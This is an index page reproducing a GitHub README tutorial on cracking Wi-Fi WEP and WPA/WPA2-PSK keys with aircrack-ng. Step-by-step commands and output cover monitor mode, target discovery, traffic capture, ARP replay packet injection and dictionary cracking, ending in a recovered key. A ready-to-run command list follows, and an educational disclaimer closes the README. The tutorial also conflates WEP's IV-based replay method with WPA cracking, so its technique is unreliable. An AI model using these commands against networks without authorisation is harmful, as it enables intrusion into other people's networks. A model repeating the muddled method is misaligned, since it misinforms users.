Ecosyste.ms: Awesome

An open API service indexing awesome lists of open source software.

Awesome Lists | Featured Topics | Projects

https://github.com/david-palma/wifi-cracking

Crack 802.11 WEP and WPA/WPA2-PSK keys using Aircrack-ng suite
https://github.com/david-palma/wifi-cracking

aircrack-ng education hack hacking infosec penetration-testing practice security tutorial wep wifi wifi-cracking wpa wpa2

Last synced: 3 months ago
JSON representation

Crack 802.11 WEP and WPA/WPA2-PSK keys using Aircrack-ng suite

Awesome Lists containing this project

README

        

# Wi-Fi cracking with aircrack-ng

[Aircrack-ng](https://aircrack-ng.org/) is basically a network software suite that has been crafted to achieve the following objectives:

* packet sniffing
* attacking (replay attacks, deauthentication, fake access points...) via packet injection
* testing Wi-Fi cards and driver capabilities (capture and injection)
* cracking WEP and WPA/WPA2 Wi-Fi routers

Note that the present tutorial is not an exhaustive guide, rather it is intended to build some basic skills to test your own network's security and get familiar with the concepts.

The attack outlined below is based on a passive technique (ARP request replay attack) and it focuses on debian-based distributions assuming you have a working wireless card with drivers already patched for injection.

## Aircrack-ng installation

Aircrack-ng can be installed on a debian-based operating system by compiling the source code (for more details you can visit the [official website](https://aircrack-ng.org/)).

### Installing required and optional dependencies

Below you can find instructions for installing the basic requirements to build aircrack-ng for Debian-based operating systems.

```ShellSession
$ sudo apt install build-essential autoconf automake libtool pkg-config libnl-3-dev libnl-genl-3-dev libssl-dev ethtool shtool rfkill zlib1g-dev libpcap-dev libsqlite3-dev libpcre3-dev libhwloc-dev libcmocka-dev hostapd wpasupplicant tcpdump screen iw usbutils
```

Get the latest copy of aircrack-ng:

```ShellSession
$ git clone https://github.com/aircrack-ng/aircrack-ng
$ cd aircrack-ng
```

### Compiling and installing

To build aircrack-ng, the Autotools build system is used.
First, `./configure` the project for building with the appropriate options:

```ShellSession
$ autoreconf -i
$ ./configure --with-experimental
```

Next, compile the project with the `make` command and use the "installing" target from the additional targets listed below to complete the installation.

* Execute all unit testing: `make check`
* Execute all integration testing (requires root): `make integration`
* Installing: `make install`
* Uninstall: `make uninstall`

## Test wireless device packet injection

The purpose of this step ensures that your card successfully supports injection.
Assuming your interface name is "wlan0" (you can retrieve it typing `iwconfig` on the terminal), type the following command:

```ShellSession
# aireplay-ng --test wlan0
```

The system responds:

```ShellSession
18:10:59 wlan0 channel: 10
18:10:59 Trying broadcast probe requests...
18:10:59 Injection is working!
18:11:00 Found 1 AP
...
```

This confirms your card can inject packets.

## Simple sniffing and cracking

### 1. Start the wireless interface in monitor mode

The first thing to do is looking out for a potential target putting your wireless card into monitor mode using `airmon-ng`. However, it is strongly recommended to `kill` all interfering processes prior to using the aircrack-ng suite.

```ShellSession
# airmon-ng check kill
Killing these processes:

PID Name
870 dhclient
1115 wpa_supplicant
```

Then, it is possible to enable the monitor mode used to create another interface (mon0):

```ShellSession
# airmon-ng start wlan0

PHY Interface Driver Chipset

phy0 wlan0 ath9k Qualcomm Atheros AR9485
(monitor mode enabled for [phy0]wlan0 on [phy0]mon0)
```

You will notice that "wlan0" has successfully been put into monitor mode.
Then, start `airodump-ng` to look out for networks:

```ShellSession
# airodump-ng mon0
```

Locate the wireless network you want to crack, and note its BSSID and channel from the following output:

```ShellSession
CH 10 ][ Elapsed: 36 s][2019-05-15 18:15
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
08:00:BF:E6:31:2E -21 100 5240 178307 338 10 54 WPA CCMP PSK infosec_router
...
```

Note that the top part of the output lists information about APs in range, and the bottom part lists clients connected to the corresponding APs.

### 2. Start airodump-ng to capture the initial vectors

Open another console session to capture the initial vectors generated by the target and to save the result into a file:

```ShellSession
# airodump-ng -c 10 --bssid 08:00:BF:E6:31:2E -w output-file mon0
```

where `-c 10` is the channel for the wireless network, `--bssid 08:00:BF:E6:31:2E` is the MAC address of the AP, `-w output-file` defines the output files that will contain the initialization vectors, and `mon0` is the interface name.

The system responds:

```ShellSession
CH 10 ][ Elapsed: 12 s][2019-05-15 18:16
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
08:00:BF:E6:31:2E -21 100 5240 178307 338 10 54 WPA CCMP PSK infosec_router

BSSID STATION PWR Lost Packets Probes
08:00:BF:E6:31:2E 00:0F:35:51:AC:22 -21 0 183782
```

After the execution of the command various files will be generated.

### 3. Start aireplay-ng in ARP request replay mode

The classic ARP request replay attack is the most effective way to generate new initialization vectors, and works very reliably. The purpose of this step is to start `aireplay-ng` in a mode which listens for ARP requests then reinjects them back to the access point.
Keep your `airodump-ng` and `aireplay-ng` running, open another terminal and run the ARP request replay attack:

```ShellSession
# aireplay-ng --arpreplay -b 08:00:BF:E6:31:2E -h 00:0F:35:51:AC:22 mon0

Saving ARP requests in replay_arp-0321-191525.cap
You should also start airodump-ng to capture replies.
Read 618643 packets (got 304896 ARP requests), sent 194947 packets...
```

You can check if the packets are injected by looking at the `airodump-ng` screen.

### Run aircrack-ng to obtain the WPA key

At this point, you should be able to obtain the WPA key from the initialization vectors gathered in the previous steps. To perform this attack you need a wordlist and if the network password is not in the wordfile you will not crack the password. Note that most WPA/WPA2 routers come with strong 12 character random passwords that many users (rightly) leave unchanged. If you are attempting to crack one of these passwords, I recommend using the [WPA-length password lists](https://github.com/david-palma/wordlists#passwords-with-wpa-length).

Open another console session and type:

```ShellSession
# aircrack-ng -a2 -b 08:00:BF:E6:31:2E -w wordlist.txt output*.cap
```

where `-a2` specifies the attack mode for WPA/WPA2-PSK, `-w wordlist.txt` refers to your own dictionary wordlist, and `output*.cap` selects all output files with `.cap` extension.

This is the output of a successful attack:

```ShellSession
Aircrack-ng 1.5.2
[00:00:00] 192/1229 keys tested (520.04 k/s)

Time left: 0 seconds 15.62%

KEY FOUND! [ notsecure ]

Master Key : 42 28 5E 5A 73 33 90 E9 34 CC A6 C3 B1 CE 97 CA
06 10 96 05 CC 13 FC 53 B0 61 5C 19 45 9A CE 63

Transient Key : 86 D0 43 C9 AA 47 F8 03 2F 71 3F 53 D6 65 F3 F3
86 36 52 0F 48 1E 57 4A 10 F8 B6 A0 78 30 22 1E
4E 77 F0 5E 1F FC 73 69 CA 35 5B 54 4D B0 EC 1A
90 FE D0 B9 33 06 60 F9 33 4B CF 30 B4 A8 AE 3A

EAPOL HMAC : 8E 52 1B 51 E8 F2 7E ED 95 F4 CF D2 C6 D0 F0 68
```

## List of commands

Below you can find the list of all of the commands needed to crack a WPA/WPA2 network.

```
# kill all interfering processes prior to using the aircrack-ng
airmon-ng check kill

# put your network device into monitor mode
airmon-ng start wlan0

# listen for all nearby beacon frames to get target BSSID and channel
airodump-ng mon0

# start listening for the handshake on a new console session
airodump-ng -c 10 --bssid 08:00:BF:E6:31:2E -w output-file mon0

# start the ARP request replay attack
aireplay-ng --arpreplay -b 08:00:BF:E6:31:2E -h 00:0F:35:51:AC:22 mon0

# run aircrack-ng to obtain the WPA key
aircrack-ng -a2 -b 08:00:BF:E6:31:2E -w wordlist.txt output*.cap
```

## License

This project is licensed under the MIT License - see the [LICENSE](LICENSE) file for details.

## Disclaimer

This tutorial has been made for educational purposes only, I don't promote malicious practices and I will not be responsible for any illegal activities.